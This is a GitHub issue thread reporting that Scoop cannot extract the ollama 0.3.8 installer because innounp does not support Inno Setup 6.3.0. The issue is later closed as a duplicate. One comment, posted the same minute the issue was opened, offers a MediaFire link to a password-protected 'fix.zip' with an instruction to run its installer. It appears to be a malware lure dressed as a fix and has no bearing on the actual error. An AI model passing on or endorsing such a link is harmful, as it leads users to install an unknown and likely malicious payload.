### ISSUE TITLE
ollama@0.3.8: decompress error

### ISSUE THREAD

**Issue by misaligar** [ScoopInstaller/Main#6146] opened 2024-08-29 03:29 UTC
```
~ scoop install ollama
Installing 'ollama' (0.3.8) [64bit] from 'main' bucket
Loading OllamaSetup.exe from cache
Checking hash of OllamaSetup.exe ... ok.
Extracting OllamaSetup.exe ... ERROR Exit code was 1!
Failed to extract files from C:\Users\misaligar\scoop\apps\ollama\0.3.8\OllamaSetup.exe.
Log file:
  ~\scoop\apps\ollama\0.3.8\innounp.log

Please try again or create a new issue by using the following link and paste your console output:
https://github.com/ScoopInstaller/Main/issues/new?title=ollama%400.3.8%3a+decompress+error
```

Here is the contents of `innounp.log`

```
Signature detected: Inno Setup Setup Data (6.3.0)
This is not directly supported, but i'll try to unpack it as version 5602
; Version detected: 6300
Unpacking failed. This version is not supported.
```

**Comment by Kudjo-Grand** [comment] 2024-08-29 03:29
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by misaligar** [comment] 2024-08-29 03:30
Why?

**Comment by lapo-luchini** [comment] 2024-09-06 10:37
Duplicate of #6143.

**Closed** 2024-09-28 07:42 UTC
